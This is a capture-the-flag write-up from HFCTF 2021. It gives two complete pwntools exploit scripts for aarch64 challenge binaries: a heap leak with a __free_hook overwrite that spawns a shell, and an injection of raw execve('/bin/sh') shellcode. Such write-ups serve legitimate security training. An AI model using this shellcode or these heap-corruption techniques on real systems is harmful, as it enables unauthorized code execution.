HFCTF_2021

只做了两个常规pwn,区块链什么的我真不会

apollo

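#coding=utf-8
"""HFCTF 2021 "apollo" exploit (aarch64 binary run under qemu-user, libc-2.27).

Reverse-engineering notes (offsets relative to the program base):

    func_table:   proc_base + 0x14018
    opcode_table: proc_base + 0x13FE8

The target interprets a small byte-code program.  Opcode, operands and how far
the interpreter advances (``opcode += n``), as observed:

    0x4D  init:      operands 0x10, 0x10 seen; calloc(location, 1);
                     calloc(timeS, 1);                                opcode += 3
    0x2A  add:       p8(index0) + p8(index1) + p16(size);             opcode += 5
                     (observed to work only once per slot)
    0x2F  free:      p8(index0) + p8(index1);                         opcode += 3
    0x2B  set loc:   p8(index0) + p8(index1) + p8(location);          opcode += 4
                     (1 < size <= 4)
    0x2D  clear loc: p8(index0) + p8(index1), location := 0;          opcode += 3
    0x77 'w' up     )  move the cursor on the 10x10 grid below;       opcode += 1
    0x73 's' down   )  a cell holding 2 or 3 becomes 2,
    0x61 'a' left   )  a cell holding 0 becomes 1
    0x64 'd' right  )
    0x70 'p' show;                                                    opcode += 1
    0x00     exit
    0x01     default (no-op);                                         opcode += 1

    10 x 10 grid, initially all zero:
    0 0 0 0 0 0 0 0 0 0
    0 0 0 0 0 0 0 0 0 0
    0 0 0 0 0 0 0 0 0 0
    0 0 0 0 0 0 0 0 0 0
    0 0 0 0 0 0 0 0 0 0
    0 0 0 0 0 0 0 0 0 0
    0 0 0 0 0 0 0 0 0 0
    0 0 0 0 0 0 0 0 0 0
    0 0 0 0 0 0 0 0 0 0
    0 0 0 0 0 0 0 0 0 0

All payloads are ``bytes`` literals: on Python 3 pwntools UTF-8-encodes a
``str`` argument, which would mangle every byte >= 0x80 (e.g. the 0xF0 size
byte below) and silently break the exploit.  ``bytes`` works on both 2 and 3.
"""
import sys

from pwn import *

# context.log_level = 'DEBUG'

HOST, PORT = '8.140.179.11', 13422
LIBC_PATH = './libc-2.27.so'

# Environment-specific constants.  The value printed by the target apparently
# lacks the high bits of qemu-user's guest mapping, so they are OR-ed back in;
# the offset from the leaked pointer to the libc base was measured against this
# libc-2.27 build under qemu-aarch64.  Both must be re-derived for any other
# libc, qemu version or guest base -- TODO confirm by comparing with a local run.
QEMU_GUEST_BASE = 0x4000000000
LEAK_TO_LIBC_BASE = 0xF10 + 0x154000


def connect():
    """Open the target: remote by default, the local qemu-user run when argv[1] is ``local``.

    ``-g 5555`` makes qemu wait for a gdb(-multiarch) attach on that port
    before the guest starts.
    """
    if len(sys.argv) > 1 and sys.argv[1] == 'local':
        return process(['qemu-aarch64', '-g', '5555', '-L', '.', './main'])
    return remote(HOST, PORT)


def build_program():
    """Return the byte-code program sent at the ``cmd> `` prompt.

    The byte sequence is the working exploit, preserved byte-for-byte; the
    comments give the apparent intent of each step (slot numbers follow the
    author's labels).  Sizes are little-endian p16.
    """
    prog = b'\x4D\x10\x10'              # init all variables
    prog += b'\x2A\x00\x04\xF0\x04'     # Add 0: size 0x4F0 (above the tcache limit, so the
                                        # free below presumably lands in the unsorted bin)
    prog += b'\x2A\x00\x05\x10\x00'     # Add 1: size 0x10
    prog += b'\x2F\x00\x04'             # delete 0
    prog += b'\x2A\x00\x04\xF0\x00'     # Add 0: size 0xF0, re-carved from the freed chunk
    prog += b'\x70'                     # show -> source of the libc leak read in main()
    prog += b'\x73' * 0xE               # move down 14 times
    prog += b'\x64\x61' * 0x36          # right/left 54 times (net zero movement; each step
                                        # toggles grid cells as noted in the module docstring)
    prog += b'\x64' * 6                 # move right 6 times
    prog += b'\x2B\x0E\x07\x03'         # set location (0x0E, 0x07) := 3
    prog += b'\x64'                     # move right
    prog += b'\x2B\x0F\x08\x03'         # set location (0x0F, 0x08) := 3
    prog += b'\x73'                     # move down
    prog += b'\x2A\x00\x06\x70\x00'     # Add 2: size 0x70
    prog += b'\x2A\x00\x07\x70\x03'     # Add 3: size 0x370
    prog += b'\x2F\x00\x06'             # delete 2
    prog += b'\x2F\x00\x04'             # delete 0
    prog += b'\x2A\x00\x04\x70\x01'     # Add 0: size 0x170
    prog += b'\x2A\x00\x06\x70\x00'     # Add 2: size 0x70
    prog += b'\x2A\x00\x08\x70\x00'     # Add free_hook (slot whose allocation is later
                                        # redirected onto __free_hook): size 0x70
    prog += b'\x2F\x00\x06'             # delete 2
    prog += b'\x00'                     # exit
    return prog


def parse_leak(raw):
    """Turn the line printed after ``pos:0,4`` into a libc base address.

    ``raw`` is the leaked pointer as printed (fewer than 8 bytes); it is
    zero-padded, the guest-base bits restored and the fixed offset removed.
    """
    leaked = u64(raw.ljust(8, b'\x00'))
    return (leaked | QEMU_GUEST_BASE) - LEAK_TO_LIBC_BASE


def main():
    libc = ELF(LIBC_PATH)
    p = connect()

    p.sendlineafter(b'cmd> ', build_program())

    # From here on the target reads chunk contents from stdin.  The sleeps keep
    # successive sends from being coalesced into one read; they are timing-
    # dependent and may need to be raised on a slow link.
    sleep(0.1)
    p.sendline(b'FMYY')
    sleep(0.1)
    p.sendline(b'FMYY')
    sleep(0.1)
    p.send(b'\x10')

    p.recvuntil(b'pos:0,4\n')
    libc_base = parse_leak(p.recvuntil(b'\n', drop=True))
    # A libc base is page-aligned; anything else means the leak line was not
    # what we expected (wrong prompt, different libc/qemu layout).  log.error
    # raises, so we stop before writing garbage into the hooks.
    if libc_base & 0xFFF:
        log.error('implausible libc base %#x - leak parsing or offsets are wrong' % libc_base)
    log.info('LIBC:\t' + hex(libc_base))
    log.info('__malloc_Hook:\t' + hex(libc_base + libc.sym['__malloc_hook']))
    system = libc_base + libc.sym['system']
    free_hook = libc_base + libc.sym['__free_hook']
    log.info('__free_hook:\t' + hex(free_hook))

    p.sendline(b'FMYY')
    sleep(0.1)
    p.sendline(b'FMYY')
    sleep(0.1)
    # 0x100 filler bytes followed by a pointer: presumably overruns into a freed
    # chunk's fd so the next allocation of that size is served from __free_hook
    # (tcache-style poisoning) -- TODO confirm the heap layout in a local run.
    p.sendline(b'\x00' * 0x100 + p64(free_hook))
    sleep(0.1)
    p.sendline(b'/bin/sh\x00')          # chunk content whose later free() becomes system("/bin/sh")
    sleep(0.1)
    p.sendline(p64(system))             # written into the allocation that landed on __free_hook
    sleep(0.1)

    p.interactive()


if __name__ == '__main__':
    main()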

quite

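#coding=utf-8
"""HFCTF 2021 "quite" exploit (aarch64 binary run under qemu-user).

Reverse-engineering notes on the target's byte-code interpreter:

    X22: data pointer, initially 0x100000000000
    X21: opcode (program) memory

    N:0  0x28 '('  X22--;                    opcode += 1
    N:1  0x29 ')'  X22++;                    opcode += 1
    N:2  0x2A '*'  [X22]++;                  opcode += 1
    N:3  0x2F '/'  [X22]--;                  opcode += 1
    N:4  0x40 '@'  _IO_putc(X22);            opcode += 1
    N:5  0x23 '#'  _IO_getc(X22);            opcode += 1
    N:6  0x5B '['
    N:7  0x5D ']'
    N:8  0x00      end
    N:9  0x47 'G'  call 0x100000000000
    N:A  0x01      default

Opcode 0x47 transfers control to the start of the data region, so a program
that reads one stdin byte into each successive cell and then executes 'G' runs
whatever was fed on stdin as native code.  No NX/W^X stands in the way here
(it works), so plain shellcode suffices.

Payloads are ``bytes`` literals: on Python 3 pwntools UTF-8-encodes a ``str``
argument, which would corrupt every shellcode byte >= 0x80.
"""
import sys

from pwn import *

HOST, PORT = '8.140.179.11', 51322

# 40-byte aarch64 execve("/bin/sh", NULL, NULL) shellcode, one instruction per
# group.  Decoded by hand -- confirm with a disassembler before reusing it:
#   movz/movk x1 <- "/bin/sh\0"; str x1, [sp, #-8]!; x1 = x2 = 0; x0 = sp;
#   x8 = 221 (execve); svc #0x1337.
SHELLCODE = (
    b'\xE1\x45\x8C\xD2'
    b'\x21\xCD\xAD\xF2'
    b'\xE1\x65\xCE\xF2'
    b'\x01\x0D\xE0\xF2'
    b'\xE1\x8F\x1F\xF8'
    b'\xE1\x03\x1F\xAA'
    b'\xE2\x03\x1F\xAA'
    b'\xE0\x63\x21\x8B'
    b'\xA8\x1B\x80\xD2'
    b'\xE1\x66\x02\xD4'
)


def connect():
    """Open the target: remote by default, the local qemu-user run when argv[1] is ``local``.

    ``-g 6666`` makes qemu wait for a gdb(-multiarch) attach on that port.
    """
    if len(sys.argv) > 1 and sys.argv[1] == 'local':
        return process(['qemu-aarch64', '-g', '6666', '-L', '.', './main'])
    return remote(HOST, PORT)


def build_program(shellcode):
    """Return a program that stores ``shellcode`` at the data pointer and jumps to it.

    For every shellcode byte: '#' reads one stdin byte into [X22], ')' advances
    X22.  The trailing 'G' calls 0x100000000000, the data region's start.
    """
    return b'\x23\x29' * len(shellcode) + b'\x47'


def main():
    p = connect()
    p.send(build_program(SHELLCODE))

    # The program text and the shellcode must arrive in separate reads;
    # presumably the target reads the whole program first and only then starts
    # executing '#'.  This sleep is what keeps the shellcode from being consumed
    # as program text, so raise it if the remote end is slow.
    sleep(0.5)
    p.send(SHELLCODE)
    p.interactive()


if __name__ == '__main__':
    main()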